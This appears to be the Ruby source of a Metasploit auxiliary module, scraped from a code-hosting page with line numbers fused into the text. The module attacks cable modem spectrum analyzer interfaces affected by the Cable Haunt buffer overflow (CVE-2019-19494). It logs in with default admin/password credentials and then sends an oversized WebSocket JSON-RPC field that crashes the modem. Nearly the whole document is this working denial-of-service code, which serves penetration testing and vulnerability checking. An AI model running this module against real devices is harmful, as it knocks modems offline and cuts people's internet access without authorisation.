Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'eventmachine'6require 'faye/websocket'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(13update_info(14info,15'Name' => '"Cablehaunt" Cable Modem WebSocket DoS',16'Description' => %q{17There exists a buffer overflow vulnerability in certain18Cable Modem Spectrum Analyzer interfaces. This overflow19is exploitable, but since an exploit would differ between20every make, model, and firmware version (which also21differs from ISP to ISP), this module simply causes a22Denial of Service to test if the vulnerability is present.23},24'Author' => [25'Alexander Dalsgaard Krog (Lyrebirds)', # Original research, discovery, and PoC26'Jens Hegner Stærmose (Lyrebirds)', # Original research, discovery, and PoC27'Kasper Kohsel Terndrup (Lyrebirds)', # Original research, discovery, and PoC28'Simon Vandel Sillesen (Independent)', # Original research, discovery, and PoC29'Nicholas Starke' # msf module30],31'References' => [32['CVE', '2019-19494'],33['EDB', '47936'],34['URL', 'https://cablehaunt.com/'],35['URL', 'https://github.com/Lyrebirds/sagemcom-fast-3890-exploit']36],37'DisclosureDate' => '2020-01-07',38'License' => MSF_LICENSE,39'Notes' => {40'Stability' => [CRASH_SERVICE_DOWN],41'SideEffects' => [IOC_IN_LOGS],42'Reliability' => []43}44)45)4647register_options(48[49Opt::RHOST('192.168.100.1'),50Opt::RPORT(8080),51OptString.new('WS_USERNAME', [true, 'WebSocket connection basic auth username', 'admin']),52OptString.new('WS_PASSWORD', [true, 'WebSocket connection basic auth password', 'password']),53OptInt.new('TIMEOUT', [true, 'Time to wait for response', 15])54]55)5657deregister_options('Proxies')58deregister_options('VHOST')59deregister_options('SSL')60end6162def run63res = send_request_cgi({64'method' => 'GET',65'uri' => '/',66'authorization' => basic_auth(datastore['WS_USERNAME'], datastore['WS_PASSWORD'])67})6869fail_with(Failure::Unreachable, 'Cannot Connect to Cable Modem Spectrum Analyzer Web Service') if res.nil?70fail_with(Failure::Unknown, 'Credentials were incorrect') if res.code != 2007172@succeeded = false73EM.run do74print_status("Attempting Connection to #{datastore['RHOST']}")7576driver = Faye::WebSocket::Client.new("ws://#{datastore['RHOST']}:#{datastore['RPORT']}/Frontend", ['rpc-frontend'])7778driver.on :open do79print_status('Opened connection')8081EM::Timer.new(1) do82print_status('Sending payload')83payload = Rex::Text.rand_text_alphanumeric(7000..8000)84driver.send({85jsonrpc: '2.0',86method: 'Frontend::GetFrontendSpectrumData',87params: {88coreID: 0,89fStartHz: payload,90fStopHz: 1000000000,91fftSize: 1024,92gain: 193},94id: '0'95}.to_json)96rescue StandardError97fail_with(Failure::Unreachable, 'Could not establish websocket connection')98end99end100101EM::Timer.new(10) do102print_status('Checking Modem Status')103begin104res = send_request_cgi({105'method' => 'GET',106'uri' => '/'107})108109if res.nil?110@succeeded = true111print_status('Cable Modem unreachable')112else113fail_with(Failure::Unknown, 'Host still reachable')114end115rescue StandardError116@succeeded = true117print_status('Cable Modem unreachable')118end119end120121EM::Timer.new(datastore['TIMEOUT']) do122EventMachine.stop123if @succeeded124print_good('Exploit delivered and cable modem unreachable.')125else126fail_with(Failure::Unknown, 'Unknown failure occurred')127end128end129end130end131end132133134